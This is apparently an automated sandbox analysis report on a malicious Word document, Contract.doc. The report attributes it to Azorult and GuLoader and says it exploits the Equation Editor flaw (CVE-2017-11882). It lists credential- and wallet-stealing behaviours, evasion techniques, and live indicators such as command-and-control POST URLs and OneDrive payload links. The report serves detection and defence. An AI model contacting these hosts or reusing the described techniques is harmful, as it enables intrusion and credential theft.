Analysis Report Contract.doc

Overview

General Information

Sample Name: Contract.doc
Analysis ID: 288499
MD5: dc817d20bf5493c1d8da1cc922676608
SHA1: dcd1ef30f1b0e3d13df459c458b0211e3a424613
SHA256: 79b3d9bfe6c97a51d65ff4b458b82c1afa8bff5f7a273f2248e37dffe0cdc89a
Tags: doc

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1948 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hjdegydbhk.exe (PID: 2488 cmdline: C:\Users\user\AppData\Roaming\hjdegydbhk.exe MD5: 87C9AB14C3851591C94AD24D94E6A7DD)
      • hjdegydbhk.exe (PID: 2508 cmdline: C:\Users\user\AppData\Roaming\hjdegydbhk.exe MD5: 87C9AB14C3851591C94AD24D94E6A7DD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000003.2137580410.00000000202A0000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000005.00000003.2138848101.000000001F4D0000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000005.00000003.2139429769.0000000020270000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000005.00000002.2139679686.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
00000005.00000003.2137593447.000000001FE70000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, CommandLine: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: C:\Users\user\AppData\Roaming\hjdegydbhk.exe, ProcessId: 2488
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscre[1].exe

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Contract.doc | Avira: detected
Multi AV Scanner detection for domain / URL
Source: officestore.co.id | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscre[1].exe | Virustotal: Detection: 44%
Multi AV Scanner detection for submitted file
Source: Contract.doc | Virustotal: Detection: 44%
Source: Contract.doc | ReversingLabs: Detection: 44%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: global traffic | DNS query: name: www.uttaranchaltoday.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 103.247.10.55:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49170
Source: Traffic | Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49171 -> 103.247.10.55:80
Source: Joe Sandbox View | ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 107 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 30 13 eb 26 66 9a 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 96 40 70 9d 32 70 9d 3b 70 9d 35 11 8b 30 65 8b 30 62 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p0&f&f&f&f&g&f@p2p;p50e0b
Source: global traffic | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 80084 | Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B54A00-30CA-4646-ACFF-79FC9E14ADCB}.tmp
Source: hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: www.uttaranchaltoday.com
Source: unknown | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 107 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 30 13 eb 26 66 9a 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 96 40 70 9d 32 70 9d 3b 70 9d 35 11 8b 30 65 8b 30 62 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p0&f&f&f&f&g&f@p2p;p50e0b
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://officestore.co.id/linkzer/PL341/index.php
Source: hjdegydbhk.exe, 00000005.00000002.2143209643.000000001E440000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: hjdegydbhk.exe, 00000005.00000002.2143209643.000000001E440000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: hjdegydbhk.exe, 00000005.00000002.2139819524.000000000062A000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: hjdegydbhk.exe, 00000004.00000002.2103881982.0000000003177000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com0
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: https://gysc9q.bl.files.1drv.com/
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp, hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmp | String found in binary or memory: https://gysc9q.bl.files.1drv.com/y4mzx_E9xBIyaAWstdZ_AKWk7_4uY1-LIrkBkeqCoIHMHpALNVPeoN7gEqc2K090OVA
Source: hjdegydbhk.exe, 00000005.00000002.2139775413.00000000005DB000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/G
Source: hjdegydbhk.exe, 00000005.00000002.2139775413.00000000005DB000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/O
Source: hjdegydbhk.exe, 00000005.00000002.2139785125.00000000005EC000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21175&authkey=AD2-9NY
Source: hjdegydbhk.exe, 00000005.00000002.2139830064.0000000000639000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: hjdegydbhk.exe, 00000005.00000003.2126121251.000000001F9D8000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 68106295534377010496264.tmp.5.dr | String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscre[1].exe
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B3C71 NtResumeThread
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B02EF EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B1727 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B391A NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B35B3 NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B3C93 NtResumeThread
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B3CEA NtResumeThread
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B28CA NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B3D3A NtResumeThread
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B0330 NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B192E NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B037B NtSetInformationThread,CloseServiceHandle,TerminateProcess
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B3D81 NtResumeThread
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 4_2_003B17CB NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00061204
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00085C00
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_0008521A
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00083820
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_0008363A
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00084C32
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00083C42
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00085454
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00085C54
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00084473
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00084088
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00085E8C
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00084CAC
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00083CA4
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00085CBB
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_000834C2
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_000852DA
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00082EDE
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_000814D4
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_00084CF8
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_000856FA
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Code function: 5_3_000860FA
Source: linkscre[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hjdegydbhk.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@6/61@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$ntract.doc
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-83FE4133-8C186D07
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD384.tmp
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Contract.doc | Virustotal: Detection: 44%
Source: Contract.doc | ReversingLabs: Detection: 44%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
